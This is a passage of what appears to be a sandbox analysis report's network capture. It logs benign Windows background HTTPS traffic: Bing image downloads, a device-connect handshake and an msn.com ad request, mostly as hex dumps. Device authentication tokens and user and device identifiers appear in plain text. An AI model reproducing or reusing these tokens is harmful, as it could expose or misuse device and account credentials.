2024-11-23 06:09:30 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 32 3a 31 30 20 32 32 3a 35 37 3a 32 39 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 04 38 00 00 a0 03 00 03 00 00 00 01 07 80 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 24.1 (Windows)2023:02:10 22:57:298C
2024-11-23 06:09:31 UTC	16384	IN	Data Raw: e5 ef db 72 fa 3b bf 1e 69 b0 fd b3 cb 83 4f b6 78 2d bf e9 a5 c3 3e e9 1b fe 02 b5 a7 fb 50 f8 ec 45 f1 53 c3 91 69 1a b8 8c e8 51 7f 69 46 7e 4f 24 ce ff 00 2e ef fb e3 7a f3 5e 11 e3 4d 7a 4f 10 78 86 fb 54 7f dd c7 24 8f 24 71 7f cf 34 df 5e 8e 1b 0d 25 25 36 79 b8 cc 54 14 5c 4a ba 95 cc 6f fb 8b 28 7f 77 ff 00 2d 3f e9 e1 ff 00 bd fe cd 56 46 93 ee 3d 24 6d fc 74 46 d1 a4 df f5 ce bd 33 c6 6d b6 3e 49 63 f2 76 7f cf 3a 66 ed fe 5f ee 69 be 6e ff 00 9e 89 25 d9 0e cf f9 69 4a c5 8d 93 fb e9 0f ef 23 fd e4 75 ec 9f 08 7e 34 ff 00 c2 3f 14 7a 46 bd a6 ff 00 c4 b7 e7 92 49 6c 7f bf fe ef f0 fb d7 8c 7e f3 fe 78 d4 bf 7e 1a 89 d3 52 56 65 d1 a8 e1 27 24 7d d7 63 3d a5 de 9f 6d 7b 6b 34 32 41 71 1a 49 1c 91 4b f2 7c d4 fa f8 df 4e f1 c7 89 2c bc 33 a6 e8 Data Ascii: r;iOx->PESiQiF~O$.z^MzOxT$$q4^%%6yT\Jo(w-?VF=$mtF3m>Icv:f_in%iJ#u~4?zFIl~x~RVe'$}c=m{k42AqIK\|N,3
2024-11-23 06:09:31 UTC	16384	IN	Data Raw: 6b fe 89 1e cf f5 74 dd 29 76 4d bd ff 00 d5 d3 a7 97 f7 5b 2a 64 ec cb 94 14 92 09 db ca 87 fe 9a 7f cb 4a 3f 77 fc 74 4f 14 8f 69 b1 3f d6 54 52 7f 7f fe fe 53 8e a8 ce 53 6d 58 7c f7 7f be 8e 0f 3b f7 74 ef 36 47 96 aa c1 14 7f eb d3 fe d9 d4 bb a3 87 e7 fd f5 16 48 b8 a7 26 4b ba e2 59 b6 7f ac a7 da a4 92 cd ff 00 4c e9 2d e2 df f3 bd 36 7d ff 00 71 fc ef fa 67 49 ea 8a 6d a6 4b 7c cf 6f 69 bd 26 f3 2a 2f 36 3f 27 e7 ff 00 96 94 e9 3c c7 b4 de 9f f3 d2 a3 f3 64 b8 9b e4 ff 00 57 44 56 84 da 4b a8 c7 5d fe 62 55 d8 3c 84 fb ff 00 bc ff 00 ae b5 5a 38 24 ff 00 5e ff 00 f7 ee 96 3f 3f c9 95 13 f7 91 d0 54 5a 82 2c 3b 46 97 7b e9 91 cb f6 89 b7 a4 3f eb 2a 2d bb 3e 47 9b f7 9f f2 d2 8f 2a ef ef c1 e4 fe ee 4a 05 28 b9 25 62 c4 d1 4f 6f 17 9e fe 4c 91 f9 Data Ascii: kt)vM[dJ?wtOi?TRSSmX\|;t6GH&KYL-6}qgImK\|oi&/6?'<dWDVK]bU<Z8$^??TZ,;F{?->GJ(%bOoL
2024-11-23 06:09:31 UTC	16384	IN	Data Raw: 68 ec fe cf f3 cf 37 99 fb bf dd c9 53 da ae f8 63 4a 41 19 46 da 04 f2 db ff 00 cf 6f 2f cc df e5 ff 00 d3 4a 96 0d 9f c1 51 48 a9 77 ab 6c 93 f7 71 c7 4f ba f2 da 1f 22 3f 27 f7 9f bb a0 07 79 a8 93 7c 9e 4c 92 49 25 50 ba 6f df 49 b3 fe 7a 7f cb 2a bf 6f 2c ff 00 f6 cf fe 7a 4b 46 db 77 ff 00 ae 71 ff 00 d3 2a 13 07 1b 19 de 57 ee 73 53 f9 ff 00 b9 ff 00 ae 7f ea ff 00 e9 a5 5d 8d bc ab 4f 9e 1f fe d7 50 c7 04 7e 4e ff 00 f9 67 47 30 4a cc 6c 7e 5a 7c 89 fe ae 4a 7f 95 b3 ef ff 00 df ca 8a 7f ef fe fb f8 29 24 95 ff 00 83 ff 00 22 d3 dc 98 da fb 0f ba 8a 4f be 93 43 27 fd 75 8b e7 a2 49 64 97 e4 78 7c cf 2e a9 41 3c 89 36 cf 3a ad c9 fb df df a4 d0 f9 91 d1 60 e6 e5 64 b6 b3 fe fb fe 99 f9 94 5d 45 e5 7c ff 00 f2 ce a1 8f e7 f3 3f e5 a4 95 76 d6 59 df Data Ascii: h7ScJAFo/JQHwlqO"?'y\|LI%PoIzo,zKFwqWsS]OP~NgG0Jl~Z\|J)$"OC'uIdx\|.A<6:`d]E\|?vY
2024-11-23 06:09:31 UTC	16384	IN	Data Raw: ff 00 1c a8 bc 88 fe d9 e4 25 67 5a cb 22 56 9e 94 bf 68 f3 5f fe 59 d1 6d 41 45 b7 b9 b9 e1 15 91 ee fe ca ff 00 eb 24 fd df fa df e3 ad 9d 57 4c 92 2d 3e c6 7f df 49 1c 92 27 fb 9b 3e f2 7f bb 55 7c 0f e1 58 ee ee e4 79 ef 3e c5 6b 1d b2 49 e6 7f b6 d5 d3 78 ed 60 b5 d2 62 d3 9e 6f 32 eb ca f2 ff 00 d6 fc fb 97 ee d6 91 be c6 b2 8a 4b 46 64 40 d0 43 e6 79 10 f9 7e 64 9e 64 7e 57 dc f9 ab 36 c7 c8 4f 0b c8 9f ea e4 f3 7f f6 7a b5 e5 49 6f 0c 6e 9f ec 7f e8 15 16 87 a4 5f eb 16 97 b0 59 43 0f 91 1f ef 24 f3 7e 4a b2 f9 ae 99 db f8 02 fa d3 4a f0 1c 90 27 fa bb 88 ff 00 d6 7d ff 00 9f f8 be f5 70 de 23 d1 77 ea de 7e 89 fb b8 24 fd e7 97 ff 00 3c d3 7d 6e 68 f7 d2 5d e8 76 3a 5a 4d 37 97 1c 7e 5f ef 7f be b5 b7 a5 79 77 17 77 28 9f bc f3 2d 9f cc ff 00 ec Data Ascii: %gZ"Vh_YmAE$WL->I'>U\|Xy>kIx`bo2KFd@Cy~dd~W6OzIon_YC$~JJ'}p#w~$<}nh]v:ZM7~_yww(-
2024-11-23 06:09:31 UTC	16384	IN	Data Raw: 5d 17 24 5b 48 61 ff 00 53 0c 9f f2 d3 cc a6 c9 a8 7d 9e ee 37 f2 7c cf fa 69 2d 56 be 9f f7 d2 23 f9 3f f5 ca a1 be f3 12 ef cf ff 00 9f 7f f9 e7 5c ea ed d9 9a b9 2b 59 96 35 29 64 4f f4 ab d9 bf 79 27 ef 2a 1d 2a 2d f7 72 c8 ff 00 eb 23 ff 00 d9 a9 f6 fe 64 57 7e 7b ff 00 cf 3a 35 5b 98 df e4 b5 fd df fd 33 a2 3a 2b 24 16 51 7e ee e3 e7 b9 ff 00 4b d8 93 54 53 e9 ff 00 f2 c2 7a 66 9a b1 c3 ff 00 6c ff 00 e9 95 58 8e e6 3f 3a 4f 22 6f f8 f8 ad 52 6b 61 dd a2 bd dc 52 4b ff 00 1e bf ea ff 00 e7 9d 3a ea c7 ec f0 c7 bf ce f3 e3 8b f7 9e 55 3e 46 ff 00 44 df fb a8 ea af dc f9 e7 bc 86 48 fc bf f8 05 1c f2 2f 5b 58 8a 79 60 8a 2f 22 0f 2b cc ff 00 a6 54 49 2f 95 0e cf f5 9e 5c 95 6b 74 09 0c 5b 2a bd af 90 97 7f f4 ce 4a a8 ca e8 a8 c6 cb 44 41 23 6c fb 90 Data Ascii: ]$[HaS}7\|i-V#?\+Y5)dOy'*-r#dW~{:5[3:+$Q~KTSzflX?:O"oRkaRK:U>FDH/[Xy`/"+TI/\kt[JDA#l
2024-11-23 06:09:31 UTC	16384	IN	Data Raw: 5a 7f b7 fe e5 0e 23 bc 92 dc b1 25 8c 9f bc 7f fc 87 2d 32 36 92 2f f9 e3 ff 00 5d 2a 87 db 23 4f 9f ce 9b cc 92 2f f5 95 62 0b 5f b4 5a f9 ff 00 6c f3 1e 3f f9 e5 ff 00 c5 50 f4 46 91 93 b5 e4 c9 be cd 04 b0 ef 7f fc 8b ff 00 2d 2a 19 e7 b4 b4 f3 1f f7 df bb fd dc 7f dc ff 00 be 69 d1 ac ff 00 71 21 86 3f b9 fe b7 fe 5a 51 ab 58 fd ba 6f 3e 0b cf f5 7f eb 28 25 d4 8d ec f6 22 b2 6d ff 00 bf ff 00 bf 9f b9 a7 dd 5e 49 37 97 e4 4d e5 ff 00 d3 3a 64 71 4f 6f 0f 90 93 7d a3 fe 99 c5 15 45 7d b2 d3 cc df e4 f9 f2 7f cb 4f 36 93 49 96 a4 ae 4f 3f 99 fc 73 7e ef fe 9a d5 7d d6 1e 4c 88 f3 7e f2 b3 bc d8 de 68 de 4f de 7f cb 3a 9a 3f 33 f7 90 4f fb b4 ab 2e da 5e e5 a8 e2 83 ce df fb 9f fa e9 2d 3b ca 47 86 47 4f de 79 9f f0 0a a1 6b 2c 8f 2c 9b 21 87 cb b7 ff Data Ascii: Z#%-26/]#O/b_Zl?PF-iq!?ZQXo>(%"m^I7M:dqOo}E}O6IO?s~}L~hO:?3O.^-;GGOyk,,!
2024-11-23 06:09:31 UTC	16065	IN	Data Raw: 67 92 e3 ce df 07 9d e5 ff 00 cf 3a e9 4d 49 27 14 6d 28 a6 d3 8a e8 6f 79 16 9f 63 8e 07 ff 00 59 ff 00 4d 6a ad f4 51 bf c9 65 37 d9 e4 93 f7 9e 65 56 8e fa 38 ad 23 78 21 f3 3f e9 9c b2 d4 f7 4d 1c be 67 fa 1c de 64 7f f3 ca a2 95 a2 f7 39 aa 51 e5 d5 22 bd f4 53 bf 97 3b f9 df fc 72 a9 c8 db ee f6 4f 0f fd fd 8b e7 ab 1a 55 cc ed 37 ef ff 00 d5 d4 9f 6c b4 bb 86 44 78 7c bf 2f 7f ef 3c da e9 e6 71 7b 0e 11 94 37 5b 19 32 4a 89 34 9b e1 f3 3c ca 7c 96 36 9f 73 fe 5b c7 ff 00 2c ea 58 20 8d 21 92 74 f3 bc ca a0 ed bf 52 f3 3c ef dd ff 00 e3 f5 bb 57 2a 6f 9b 66 11 ac 09 36 fa 97 ca f3 7e 44 9a 1f fb 6b 55 6f 9b 7c d2 6c ff 00 9e 75 6b 4a b9 81 6d 3f 7f 4c c6 52 70 57 b9 9b 24 5b 26 ff 00 b6 bf ea ea 58 63 92 19 be 7f dd d3 ee ee 7c ab bd f5 3d a4 f0 5d Data Ascii: g:MI'm(oycYMjQe7eV8#x!?Mgd9Q"S;rOU7lDx\|/<q{7[2J4<\|6s[,X !tR<W*of6~DkUo\|lukJm?LRpW$[&Xc\|=]
2024-11-23 06:09:31 UTC	16384	IN	Data Raw: a9 6a c4 9a 9d c5 bf ee e0 ff 00 59 ff 00 4d 6b 26 7b 98 e5 87 7f fc b4 8e 4f de 54 f2 59 c8 ff 00 e9 5f 6c 9b cb ff 00 a6 55 94 63 aa e6 17 24 79 17 33 0b 59 ef ef 66 d8 f3 43 24 7f ea ea 59 34 8b b7 9b 63 f9 31 c7 e6 7f ac 96 a8 5d 49 05 a4 de 4d ac de 67 fc f4 b9 92 88 1a fe 2b bf 3a 0f f5 1f f2 d3 fb 95 6e 0f 99 b5 a2 2f 95 a5 7b d8 bf fd 99 ab 5b c3 1e f8 61 93 cb fd e7 ee a5 ad 4f 0e ea b1 a6 ad 62 fa 8f ee e4 8e e7 cc 8a 5f 2b fd 5d 63 47 a8 7d a3 4f 93 67 9d 1c 91 c9 57 7e d9 05 dc 31 a4 f0 f9 92 79 7f eb 62 ff 00 96 89 5a c6 4e fe f2 1c 53 fb 48 9f c6 96 7f 68 f1 0d f5 ed af 9d 6f f6 89 3f 79 e5 fd cd ed 59 de 15 82 39 7f e3 eb fe 59 c9 e5 cb 2f fb 55 a3 63 79 7f fc 7f ea e4 ff 00 96 b2 d4 53 b5 a2 79 71 a7 ee e4 f2 ff 00 e5 94 55 53 a8 ad 64 1e Data Ascii: jYMk&{OTY_lUc$y3YfC$Y4c1]IMg+:n/{[aOb_+]cG}OgW~1ybZNSHho?yY9Y/UcySyqUSd
2024-11-23 06:09:31 UTC	16384	IN	Data Raw: bf f8 aa 2b 3e 0b 38 fe d7 24 73 f9 d1 ff 00 d3 4a 2b ba 3a 23 aa 34 e0 96 e3 7e dd 25 c7 c9 07 ee e4 92 9d 1d e7 d9 2e f7 ff 00 ac f3 3f e7 95 47 6b 16 c8 77 bc 3e 64 f2 7e f3 cb 96 5f 92 b3 ef ad ae ec ae b6 49 0f 97 e6 7f cf 2a 9a 71 83 7c a2 6a cb 94 b5 fd a7 3f da ff 00 e5 b4 9f f4 ce 2f b9 5a 52 4f 68 ff 00 7f fd 64 91 ff 00 ac fb e9 5c f4 9e 63 fc fe 75 4b 6b 79 e5 4d f3 ff 00 ac ff 00 96 94 dc 17 46 4c a9 73 34 d3 2d df 59 ec fd fa 4d 0c 71 ff 00 d7 1a ab 1d aa 79 db fc ef 2e 39 2b 4f ed 31 dd cd e4 7f cb 39 3f e5 9d 36 ef 47 bb b7 8a 47 9e 18 63 82 3f f5 74 f9 da 5a 87 3f 2b b3 76 31 a4 96 77 9b 62 4d e5 d6 cd bc b3 bc 3f eb a1 fd e7 fc b3 ac 69 f6 3c de 7f fa ba bb b6 0b df dc 27 fa 3a 7f cf 4a b9 49 d8 aa 97 6f 52 ce e9 e2 87 f7 16 70 c7 3f 99 Data Ascii: +>8$sJ+:#4~%.?Gkw>d~_I*q\|j?/ZROhd\cuKkyMFLs4-YMqy.9+O19?6GGc?tZ?+v1wbM?i<':JIoRp?

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.6	49784	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:30 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 37 70 59 4d 69 58 4a 6e 38 45 2b 4b 39 6c 7a 4d 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 31 64 64 37 64 31 32 61 31 30 62 37 63 66 37 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: 7pYMiXJn8E+K9lzM.1Context: 81dd7d12a10b7cf7
2024-11-23 06:09:30 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-23 06:09:30 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 37 70 59 4d 69 58 4a 6e 38 45 2b 4b 39 6c 7a 4d 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 31 64 64 37 64 31 32 61 31 30 62 37 63 66 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 36 6d 33 39 2f 70 35 62 71 4b 33 4e 2b 6b 31 2f 6d 71 42 62 4a 55 63 34 6f 4d 32 4f 38 72 56 46 47 67 45 31 57 59 51 58 7a 4d 45 54 45 53 4c 64 78 61 30 61 4c 51 6d 79 35 5a 69 39 4e 52 39 35 34 2b 5a 2b 58 6f 72 68 48 59 36 74 36 33 73 53 2f 72 67 50 68 58 36 6f 4a 79 2f 61 71 61 6d 50 43 5a 31 54 74 62 61 65 4f 5a 46 69 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 7pYMiXJn8E+K9lzM.2Context: 81dd7d12a10b7cf7<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAR6m39/p5bqK3N+k1/mqBbJUc4oM2O8rVFGgE1WYQXzMETESLdxa0aLQmy5Zi9NR954+Z+XorhHY6t63sS/rgPhX6oJy/aqamPCZ1TtbaeOZFi
2024-11-23 06:09:30 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 37 70 59 4d 69 58 4a 6e 38 45 2b 4b 39 6c 7a 4d 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 31 64 64 37 64 31 32 61 31 30 62 37 63 66 37 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: 7pYMiXJn8E+K9lzM.3Context: 81dd7d12a10b7cf7
2024-11-23 06:09:31 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-23 06:09:31 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 6f 31 39 65 50 6e 6c 44 58 45 79 64 49 52 6e 72 64 63 2b 6a 37 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: o19ePnlDXEydIRnrdc+j7g.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.6	49790	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:31 UTC	2591	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=88000045&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241123T060928Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=3bf9bbbc2de44c6b9f61e0465d163fe5&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=597591&metered=false&nettype=ethernet&npid=sc-88000045&oemName=ehijqc%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=ehijqc20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=597591&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1& [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAWYBm1YhnWoZBXbxPqZv4jRbyYFHrXoCKR8yDlRnn5fz9cMrDvM+ENKhD58WblGKZvckPKo/wxPIBbNstb0a2ffybX7HLt0ANyVaSOF7yfazU1km1LRmAJImRCqRFOvbSeCgr9nGr4JJlK1g2kHWSY2n2Ux7l9qmifugenC5Seu7nro4iraU6TkR1XJDMLHsIcbGfec417uFzjU8iMpawtToPCYl8bkXGQiexGQckPwGJVuDOKlyRMvBKs4JFkcP4rplqE09bXs40pZZAjn6ud+JzDRRft/NA3aBoAlpWT2sXivcw68J8XKFlFMoxUE5ONabQJ3eLb0h2TwLTWSz3xAQZgAAEHiia57ZOKKGVfxa1MdokIiwAarKbrEoPrZgMTLds2BehW1ahw13UJQ3xPnFpMpY1DKsJaz1MtgbLHqfy+j/ijItarPsUYZNRT4/m0DWmeDG4ynj7mZq+3o/yGM2qVn7PeJKfHEO+GlXD3681O2bsFegUDSl3W+uv5WDEZ/ziUbtCu2zYtOH3eqlwqP0RzSHLsTIXc6Jzy4IqcIaZGSDMDOwswoDo9+pr38c+2XdGOoJAA8PaKWtN1nQpsMJnqoDvvFudXvijYItjCd+pX8R4mqBmX7OIcl3PhOpGHDixD/dfHeKTXh1sE71Acqb6Tur/f6CvIuSR+isV8ykDFvwZtXvRFBCzSpFdm5q0uXYPvJB8bd6wT6xJ6QtIxKxFWypKPUYXFdnvCLb5v5FxoocP8foAgpqk231am8Y/TM+JYyN6V9LvV215wI0Z+oUjq7xojOZeFqv/P8S7sN82fb+SPTsi5+3HD/jgTvfp37yQEjEuGRiIJ9I1ivcQoWli3A7EpkszyeR6bs7sRxOhScp9AAhlCAFqyIIEZyhMmGu5swmT6TkpojM9pAGdIHH/kvcbTylXAaEbHIqHdro+X3YUfeb0tcB&p= Cache-Control: no-cache MS-CV: KV23mrU2tE2b7UBv.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-23 06:09:31 UTC	955	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 2943 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"RADIDS":"1,P425116216-T1-C128000000001627409+B+P10+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}] X-ARC-SIG: bii4GKFpsYXN0Hac6wXw9X5fkm3AhJgg86rbiBJ8TuwDVnK1t0HUrlvSDqii4atO0nSA+Orb1Jd1fyynVoHVi7xmsdWC2Dsf9NiAWyyzE9YVc2CvmMeovVfyBL7AsXYEt7QZXz6Y1S+eiirdM7CO60Pqmn+NqtKgjgvlX3hUFkqXa7DMzYeOUtbrjRRGXhQtbqL/OHZSxeXQaUd5dpZa9RVPV5q76/z1ZPK+RLaZ95T04l9svka1Tc1W0/VzlcSt9tBNyxBO1QUMYC4PXUT8fjrcBRrcZtGGt94/rfMY4CrbcK0KvXwKgUyMmod8Io3BYIlflmNJBVnkdIx1vLmHdA== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sat, 23 Nov 2024 06:09:30 GMT Connection: close
2024-11-23 06:09:31 UTC	2943	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.6	49791	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:31 UTC	375	OUT	GET /th?id=OADD2.10239340418546_1PNT9LCA42P8D0DO5&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-23 06:09:31 UTC	856	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 635249 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: A8004A2483C14057980E4E5A60E062B6 Ref B: EWR311000108037 Ref C: 2024-11-23T06:09:31Z Date: Sat, 23 Nov 2024 06:09:31 GMT Connection: close
2024-11-23 06:09:31 UTC	15528	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 14 68 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 32 3a 31 30 20 32 32 3a 35 36 3a 35 33 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``hExifMM*bj(1r2i``Adobe Photoshop 24.1 (Windows)2023:02:10 22:56:538
